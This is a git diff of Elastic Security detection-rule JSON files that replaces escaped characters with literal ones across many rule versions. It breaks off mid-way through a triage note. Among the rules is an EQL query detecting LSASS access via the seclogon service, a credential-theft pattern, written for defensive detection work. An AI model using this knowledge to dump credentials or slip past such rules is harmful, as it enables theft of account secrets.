diff --git a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_205.json b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_205.json
index b9545fe1d3a..7c698b8920d 100644
--- a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_205.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_104.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_104.json
index f8ea1e7a9e0..a86ab03b553 100644
--- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_104.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_105.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_105.json
index 721741ae98e..372ccda8a36 100644
--- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_105.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_106.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_106.json
index c85fe29baea..2e1471e39ba 100644
--- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_106.json
@@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_107.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_107.json index fb9c6441fbf..f84fb31f065 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_107.json +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_107.json 
@@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_108.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_108.json index 6d9c5fa1027..73a88bbf1cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_108.json +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_108.json 
@@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_109.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_109.json index 06840a5afca..86ccb457211 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_109.json +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_109.json 
@@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_103.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_103.json index 774ac9afd49..77120195d95 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_103.json 
@@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Suspicious LSASS Access via MalSecLogon", "note": "", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS \u0026 PROCESS_DUP_HANDLE \u0026 PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", "references": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" ], @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_104.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_104.json index 6b517a6a904..c782e0a2d78 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_104.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Suspicious LSASS Access via MalSecLogon", "note": "", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS \u0026 PROCESS_DUP_HANDLE \u0026 PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", "references": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" ], 
@@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_105.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_105.json index be7b07b5b71..527a7727eeb 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_105.json 
@@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Suspicious LSASS Access via MalSecLogon", "note": "", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS \u0026 PROCESS_DUP_HANDLE \u0026 PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", "references": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" ], @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", 
@@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_206.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_206.json index bd2597511d5..82fe6899d69 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_206.json +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_206.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Suspicious LSASS Access via MalSecLogon", "note": "", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS \u0026 PROCESS_DUP_HANDLE \u0026 PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", "references": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" ], 
@@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_207.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_207.json index c1eac856f4a..db8316eadca 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_207.json +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_207.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious LSASS Access via MalSecLogon", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS \u0026 PROCESS_DUP_HANDLE \u0026 PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", "references": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" ], 
@@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_101.json b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_101.json index a99283f09ce..4e3766be34c 100644 --- a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_101.json +++ b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_101.json 
@@ -39,7 +39,7 @@ ], "risk_score": 47, "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_102.json b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_102.json index c8d0e86c6a3..4c3611900f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_102.json +++ b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_102.json 
@@ -39,7 +39,7 @@ ], "risk_score": 47, "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_103.json b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_103.json index 4ec417a1ead..189751d6dc1 100644 --- a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_103.json +++ b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_103.json 
@@ -39,7 +39,7 @@ ], "risk_score": 47, "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_104.json b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_104.json index 3dc84682859..2d8534455b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_104.json 
@@ -38,7 +38,7 @@ ], "risk_score": 47, "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_104.json index 1cf1756deb2..b7c3e6a326d 100644 --- a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_104.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_105.json index 4fa9af0077d..c42dc51dc1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_105.json 
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Bitlocker Setting Disabled", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Bitlocker Setting Disabled\n\nBitLocker Drive Encryption is a data protection feature that integrates with the Windows operating system to address the data theft or exposure threats from lost, stolen, or inappropriately decommissioned computers. BitLocker helps mitigate unauthorized data access by enhancing file and system protections, such as data encryption and rendering data inaccessible. Google Workspace can sync with Windows endpoints that are registered in inventory, where BitLocker can be enabled and disabled.\n\nDisabling Bitlocker on an endpoint decrypts data at rest and makes it accessible, which raises the risk of exposing sensitive endpoint data.\n\nThis rule identifies a user with administrative privileges and access to the admin console, disabling BitLocker for Windows endpoints.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- After identifying the user, verify if the user should have administrative privileges to disable BitLocker on Windows endpoints.\n- From the Google Workspace admin console, review `Reporting \u003e Audit` and `Investigation \u003e Device` logs, filtering on the user email identified from the alert.\n - If a Google Workspace user logged into their account using a potentially compromised account, this will create an `Device sync event` event.\n\n### False positive analysis\n\n- An administrator may have intentionally disabled BitLocker for routine maintenance or endpoint updates.\n - Verify with the user that they intended to disable BitLocker on Windows endpoints.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and 
